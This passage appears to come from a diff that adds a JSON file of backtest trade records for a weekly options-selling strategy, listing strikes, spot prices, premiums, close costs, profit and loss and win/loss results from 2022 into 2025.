"strike": 30.14, + "spot": 27.063579559326172, + "premium": 0.9261427471537029, + "close_cost": 0.18454693457117832, + "pnl": 68.17958125825245, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-25 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 27.6, + "spot": 25.430309295654297, + "premium": 0.893434819882291, + "close_cost": 0.08866940692925773, + "pnl": 74.49654129530332, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-02-01 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 25.94, + "spot": 30.091341018676758, + "premium": 0.7967864886910938, + "close_cost": 4.1513410186767565, + "pnl": -338.4454529985663, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-02-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.29, + "spot": 28.329124450683594, + "premium": 0.8336814571346487, + "close_cost": 0.0, + "pnl": 77.38814571346487, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.63, + "spot": 30.086565017700195, + "premium": 0.893401381972323, + "close_cost": 0.4022492424870343, + "pnl": 43.13521394852887, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 25.72, + "spot": 23.343353271484375, + "premium": 0.9722942186834178, + "close_cost": 2.376646728515624, + "pnl": -143.42525098322062, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-01 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.81, + "spot": 23.89733123779297, + "premium": 1.269062808992702, + "close_cost": 0.08733123779297003, + "pnl": 112.19315711997321, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 24.38, + "spot": 20.40155601501465, + "premium": 1.2428186519439368, + "close_cost": 0.0003322292447269781, + "pnl": 118.26864226992097, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-03-14 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.81, + "spot": 19.035720825195312, + "premium": 1.0565125375447728, + "close_cost": 0.0, + "pnl": 99.67125375447728, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-03-21 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 19.42, + "spot": 25.210630416870117, + "premium": 1.000414534063923, + "close_cost": 5.7906304168701155, + "pnl": -482.01158828061926, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.7, + "spot": 27.23072624206543, + "premium": 0.9956702458628204, + "close_cost": 0.19335556443779023, + "pnl": 74.25146814250301, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-04-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.72, + "spot": 29.394094467163086, + "premium": 1.036918725556239, + "close_cost": 0.0, + "pnl": 97.71187255562391, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-11 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 27.63, + "spot": 22.9995059967041, + "premium": 0.8649935498807846, + "close_cost": 4.630494003295897, + "pnl": -379.5400453415113, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-04-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.46, + "spot": 22.50761604309082, + "premium": 1.1031384007376275, + "close_cost": 0.0, + "pnl": 104.33384007376274, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-04-22 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 22.96, + "spot": 19.82370376586914, + "premium": 0.896936395443678, + "close_cost": 0.02570452828221481, + "pnl": 81.14318671614632, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-04-26 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 20.22, + "spot": 18.247743606567383, + "premium": 0.8189197132252453, + "close_cost": 0.10424970311753423, + "pnl": 65.4870010107711, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.61, + "spot": 18.3098201751709, + "premium": 0.8275336090790661, + "close_cost": 0.0, + "pnl": 76.7733609079066, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-09 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 18.68, + "spot": 14.575267791748047, + "premium": 1.0004685595802032, + "close_cost": 0.00010121463557827542, + "pnl": 94.05673449446249, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-05-16 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.87, + "spot": 14.637351036071777, + "premium": 0.9919096290061811, + "close_cost": 0.0, + "pnl": 93.2109629006181, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-05-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.93, + "spot": 13.056612014770508, + "premium": 1.0614758378791898, + "close_cost": 0.17573574759993393, + "pnl": 82.59400902792558, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-05-27 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.32, + "spot": 15.898122787475586, + "premium": 0.9972668734025838, + "close_cost": 2.5781227874755857, + "pnl": -161.07559140730018, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.94, + "spot": 16.667001724243164, + "premium": 0.8256464335363809, + "close_cost": 0.038433061244090405, + "pnl": 72.74133722922905, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-06-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.43, + "spot": 15.917226791381836, + "premium": 0.6981331327514431, + "close_cost": 0.17784812541765493, + "pnl": 46.048500733378816, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-06-17 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.03, + "spot": 10.82638931274414, + "premium": 0.5613351539897851, + "close_cost": 1.2036106872558587, + "pnl": -67.21755332660736, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-06-24 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.04, + "spot": 13.362255096435547, + "premium": 0.6866299319885423, + "close_cost": 2.3222550964355477, + "pnl": -166.55251644470056, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-01 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 12.56, + "spot": 11.647796630859375, + "premium": 0.6321767084017909, + "close_cost": 0.9122033691406255, + "pnl": -30.992666073883463, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-08 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 11.88, + "spot": 13.319273948669434, + "premium": 0.7084813736748083, + "close_cost": 1.4392739486694328, + "pnl": -76.06925749946244, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-07-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.52, + "spot": 12.793953895568848, + "premium": 0.5669064522733693, + "close_cost": 0.0, + "pnl": 50.710645227336926, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-07-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 12.03, + "spot": 13.591484069824219, + "premium": 0.3797955612836157, + "close_cost": 0.03423865647240776, + "pnl": 28.57569048112079, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-07-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.26, + "spot": 14.68033218383789, + "premium": 0.35997514608792525, + "close_cost": 0.027886002362743523, + "pnl": 27.228914372518172, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.98, + "spot": 17.020397186279297, + "premium": 0.38891032797860525, + "close_cost": 0.014972289027593622, + "pnl": 31.413803895101164, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-08-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 15.68, + "spot": 17.43110466003418, + "premium": 0.38622032012647534, + "close_cost": 0.15431473252735106, + "pnl": 17.210558759912427, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-08-24 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 16.74, + "spot": 15.621132850646973, + "premium": 0.41641418925739515, + "close_cost": 1.1188671493530258, + "pnl": -73.23529600956306, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-08-29 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 15.93, + "spot": 13.997417449951172, + "premium": 0.5312362333008585, + "close_cost": 0.011324480289972905, + "pnl": 46.01117530108856, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-09-02 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 14.28, + "spot": 12.741421699523926, + "premium": 0.5889786745803143, + "close_cost": 0.03251572918100465, + "pnl": 49.66629453993096, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-09-09 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 13.0, + "spot": 14.250523567199707, + "premium": 0.4882294298608265, + "close_cost": 1.250523567199707, + "pnl": -79.21941373388805, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-09-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 13.4, + "spot": 14.77107048034668, + "premium": 0.3228258140817637, + "close_cost": 0.0862013550195293, + "pnl": 17.68244590622344, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.04, + "spot": 12.029850006103516, + "premium": 0.36948082684024586, + "close_cost": 0.16012270429058306, + "pnl": 14.955812254966279, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-09-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.57, + "spot": 10.047958374023438, + "premium": 0.29255376999880456, + "close_cost": 0.1363185095964159, + "pnl": 9.643526040238866, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-10-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.67, + "spot": 9.866480827331543, + "premium": 0.2654216715088462, + "close_cost": 0.060987915545782645, + "pnl": 14.463375596306356, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 8.75, + "spot": 9.221770286560059, + "premium": 0.3243656721423065, + "close_cost": 0.03489371125018903, + "pnl": 22.967196089211747, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-10-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 7.89, + "spot": 9.216994285583496, + "premium": 0.2476489070644292, + "close_cost": 0.04104158482258835, + "pnl": 14.680732224184087, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.23, + "spot": 10.157796859741211, + "premium": 0.33683290145217937, + "close_cost": 0.13348492641348964, + "pnl": 14.354797503868973, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2022-11-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 9.74, + "spot": 8.572283744812012, + "premium": 0.37872710184224445, + "close_cost": 1.1677162551879885, + "pnl": -81.8889153345744, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.74, + "spot": 10.82638931274414, + "premium": 0.45004184720638607, + "close_cost": 2.0863893127441404, + "pnl": -166.62474655377545, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-11-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 10.18, + "spot": 10.964879989624023, + "premium": 0.5100864949158237, + "close_cost": 0.2107242594098726, + "pnl": 23.95622355059511, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.8, + "spot": 10.539849281311035, + "premium": 0.46254148185622546, + "close_cost": 0.19892402950174892, + "pnl": 20.381745235447653, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-11-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 9.99, + "spot": 11.251420021057129, + "premium": 0.44017370030141745, + "close_cost": 0.056819395157653, + "pnl": 32.35543051437645, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2022-12-09 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 10.51, + "spot": 9.976323127746582, + "premium": 0.43019700302551955, + "close_cost": 0.5336768722534178, + "pnl": -13.33798692278982, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-12-15 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.18, + "spot": 9.379366874694824, + "premium": 0.3755968150581781, + "close_cost": 0.0073418145249278255, + "pnl": 30.84550005332503, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2022-12-19 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 9.57, + "spot": 8.725103378295898, + "premium": 0.37989744569377804, + "close_cost": 0.04984623342996186, + "pnl": 27.025121226381618, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2022-12-27 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.9, + "spot": 8.083927154541016, + "premium": 0.36263166865688934, + "close_cost": 0.0, + "pnl": 30.28316686568893, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2023-01-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 8.25, + "spot": 8.117527961730957, + "premium": 0.3426811576150013, + "close_cost": 0.0, + "pnl": 28.288115761500126, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-01-10 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 8.28, + "spot": 8.875997543334961, + "premium": 0.28144760566467664, + "close_cost": 0.5959975433349616, + "pnl": -34.44499376702849, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 11.28, + "spot": 11.977076530456543, + "premium": 0.2855930292857214, + "close_cost": 0.08277245044297388, + "pnl": 14.302057884274749, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2023-02-22 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 11.76, + "spot": 10.738565444946289, + "premium": 0.2976775132496896, + "close_cost": 1.0214345550537107, + "pnl": -75.3657041804021, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-02-28 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.95, + "spot": 10.6233549118042, + "premium": 0.4503060088079174, + "close_cost": 0.07536756948841417, + "pnl": 31.513843931950323, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2023-03-07 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 10.84, + "spot": 10.887377738952637, + "premium": 0.41932668463892586, + "close_cost": 0.04737773895263686, + "pnl": 31.214894568628896, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2023-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 11.11, + "spot": 10.023299217224121, + "premium": 0.3368562541645481, + "close_cost": 0.02441630812454465, + "pnl": 25.263994604000345, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2023-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 10.22, + "spot": 11.794659614562988, + "premium": 0.2897111478561083, + "close_cost": 1.5746596145629876, + "pnl": -131.48484667068794, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2023-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 14.76, + "spot": 16.755002975463867, + "premium": 0.2108527286052575, + "close_cost": 0.02472281966853762, + "pnl": 12.632990893671987, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2023-11-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 17.37, + "spot": 18.995811462402344, + "premium": 0.25301030834325644, + "close_cost": 0.1248286597021826, + "pnl": 6.838164864107384, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2023-11-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 18.46, + "spot": 20.872058868408203, + "premium": 0.29332641166304807, + "close_cost": 0.086085923822796, + "pnl": 14.744048784025207, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.09, + "spot": 23.80017852783203, + "premium": 0.12668403719410382, + "close_cost": 0.00034875753952182814, + "pnl": 6.653527965458199, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-01-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.52, + "spot": 24.429967880249023, + "premium": 0.15674723985441386, + "close_cost": 0.06725298412093039, + "pnl": 2.969425573348346, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-01-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.09, + "spot": 25.17204475402832, + "premium": 0.1355760901137426, + "close_cost": 0.040831294649649186, + "pnl": 3.494479546409341, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.16, + "spot": 26.607376098632812, + "premium": 0.1994721639157202, + "close_cost": 0.05356130209425469, + "pnl": 8.61108618214655, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.04, + "spot": 28.579742431640625, + "premium": 0.2521808140816173, + "close_cost": 0.09035587933184086, + "pnl": 10.202493474977643, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-02-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.74, + "spot": 29.375520706176758, + "premium": 0.2107039967984381, + "close_cost": 0.029593472149631483, + "pnl": 12.13105246488066, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-02-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.49, + "spot": 29.468280792236328, + "premium": 0.32886981028218454, + "close_cost": 0.13676269846407152, + "pnl": 13.230711181811301, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-07 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.09, + "spot": 30.66439437866211, + "premium": 0.29630626202737353, + "close_cost": 0.03435957927782707, + "pnl": 20.214668274954647, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-03-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.4, + "spot": 28.99471664428711, + "premium": 0.3859896580583806, + "close_cost": 0.15473330074784375, + "pnl": 17.145635731053684, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-03-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.44, + "spot": 30.231170654296875, + "premium": 0.3386077222298489, + "close_cost": 0.1329593732122034, + "pnl": 14.584834901764548, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.28, + "spot": 30.348764419555664, + "premium": 0.24281312727783533, + "close_cost": 0.0006781849438790427, + "pnl": 18.23349423339563, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-04-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.76, + "spot": 29.731401443481445, + "premium": 0.19864154775277854, + "close_cost": 0.09195703460171467, + "pnl": 4.688451315106386, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-04-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.87, + "spot": 30.231170654296875, + "premium": 0.13149751062859671, + "close_cost": 0.03716459192245303, + "pnl": 3.4532918706143683, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.69, + "spot": 26.0615234375, + "premium": 0.17534969302338066, + "close_cost": 0.0, + "pnl": 11.554969302338066, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2024-04-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.5, + "spot": 27.085561752319336, + "premium": 0.2620815774905978, + "close_cost": 0.046312683561162915, + "pnl": 15.596889392943488, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.29, + "spot": 26.218313217163086, + "premium": 0.33708860985265066, + "close_cost": 0.16558482452028844, + "pnl": 11.17037853323622, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-05-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.97, + "spot": 28.991546630859375, + "premium": 0.43051768545168656, + "close_cost": 0.13227873818920255, + "pnl": 23.8438947262484, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.94, + "spot": 31.098417282104492, + "premium": 0.3161727770293501, + "close_cost": 0.08201134378483976, + "pnl": 17.436143324451034, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-06-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.83, + "spot": 30.936729431152344, + "premium": 0.11801706619946284, + "close_cost": 0.0027624263315714215, + "pnl": 5.545463986789141, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-06-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.11, + "spot": 36.394996643066406, + "premium": 0.16535909850218822, + "close_cost": 0.03912769007169259, + "pnl": 6.6431408430495615, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.69, + "spot": 39.66231918334961, + "premium": 0.24589516597430272, + "close_cost": 0.10430664028543424, + "pnl": 8.178852568886848, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.77, + "spot": 36.47517013549805, + "premium": 0.3572460584490651, + "close_cost": 0.07405530022815743, + "pnl": 22.339075822090766, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-07-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.25, + "spot": 32.19613265991211, + "premium": 0.5102522051595786, + "close_cost": 0.07444322221959832, + "pnl": 37.60089829399803, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-08 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 29.29, + "spot": 28.556476593017578, + "premium": 0.7010710563537703, + "close_cost": 0.733523406982421, + "pnl": -6.235235062865071, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-15 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 29.13, + "spot": 33.67164993286133, + "premium": 1.3443930046920478, + "close_cost": 4.541649932861329, + "pnl": -322.71569281692814, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.65, + "spot": 35.06849670410156, + "premium": 1.0726123104441267, + "close_cost": 0.23177286868773184, + "pnl": 78.10394417563948, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.61, + "spot": 33.67164993286133, + "premium": 0.9025336974270779, + "close_cost": 0.400302948995118, + "pnl": 44.243074843195984, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.68, + "spot": 33.74542999267578, + "premium": 0.7006672843855561, + "close_cost": 0.30126688233047005, + "pnl": 33.960040205508605, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-09-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.67, + "spot": 29.85494613647461, + "premium": 0.5583198752384799, + "close_cost": 0.2513649605347785, + "pnl": 24.71549147037014, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-09-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.74, + "spot": 32.683048248291016, + "premium": 0.6174759014341742, + "close_cost": 0.20180667496936877, + "pnl": 35.586922646480545, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.63, + "spot": 34.74879455566406, + "premium": 0.6367598634557616, + "close_cost": 0.21373878510847355, + "pnl": 36.32210783472881, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.95, + "spot": 35.76860809326172, + "premium": 0.5650580048819869, + "close_cost": 0.26688506777102106, + "pnl": 23.83729371109658, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.24, + "spot": 35.51203155517578, + "premium": 0.3887748106878073, + "close_cost": 0.06320450408128542, + "pnl": 26.577030660652188, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-10-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.37, + "spot": 37.59922409057617, + "premium": 0.22206190396108205, + "close_cost": 0.011170960102887095, + "pnl": 15.109094385819496, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.3, + "spot": 36.2669677734375, + "premium": 0.1918650628547267, + "close_cost": 0.06901310935795602, + "pnl": 6.305195349677069, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.21, + "spot": 34.998863220214844, + "premium": 0.2972686345417941, + "close_cost": 0.12918805776409403, + "pnl": 10.828057677770005, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.13, + "spot": 38.092655181884766, + "premium": 0.4302094289490803, + "close_cost": 0.17248390795162116, + "pnl": 19.792552099745915, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-11-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.16, + "spot": 38.78839111328125, + "premium": 0.49314997677113404, + "close_cost": 0.12697034844115418, + "pnl": 30.63796283299799, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.05, + "spot": 40.697959899902344, + "premium": 0.34984927994389636, + "close_cost": 0.054400926701978936, + "pnl": 23.564835324191744, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-12-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.59, + "spot": 44.11247634887695, + "premium": 0.30722114383946053, + "close_cost": 0.12628510348151956, + "pnl": 12.113604035794097, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-12-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.54, + "spot": 40.96934509277344, + "premium": 0.4778569661937251, + "close_cost": 0.2346513259977856, + "pnl": 18.34056401959395, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-01-02 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 41.07, + "spot": 38.92718505859375, + "premium": 0.5758426116192794, + "close_cost": 2.1428149414062503, + "pnl": -159.6872329786971, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 39.71, + "spot": 38.03606414794922, + "premium": 1.1539371302987682, + "close_cost": 0.0, + "pnl": 109.41371302987682, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2025-01-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 38.8, + "spot": 41.15994644165039, + "premium": 1.2706649483175134, + "close_cost": 2.3599464416503935, + "pnl": -111.918149333288, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.69, + "spot": 41.8431396484375, + "premium": 0.7541457053564571, + "close_cost": 0.09637285856715083, + "pnl": 59.79728467893062, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-01-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.37, + "spot": 40.9520149230957, + "premium": 0.5349358221710698, + "close_cost": 0.0, + "pnl": 47.513582217106986, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-02-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.49, + "spot": 41.41242980957031, + "premium": 0.605071935133882, + "close_cost": 0.15354722245627883, + "pnl": 39.172471267760315, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.5, + "spot": 42.39761734008789, + "premium": 0.548974706494473, + "close_cost": 0.09381621521778172, + "pnl": 39.535849127669124, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-02-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.8, + "spot": 44.74918746948242, + "premium": 0.4665367631709252, + "close_cost": 0.09728710719455336, + "pnl": 30.944965597637182, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-28 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.96, + "spot": 37.090484619140625, + "premium": 0.4533985175766535, + "close_cost": 1.8695153808593759, + "pnl": -144.60168632827225, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-03-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 37.83, + "spot": 34.69435119628906, + "premium": 0.9698385639672313, + "close_cost": 0.1365974876561422, + "pnl": 77.34410763110891, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.39, + 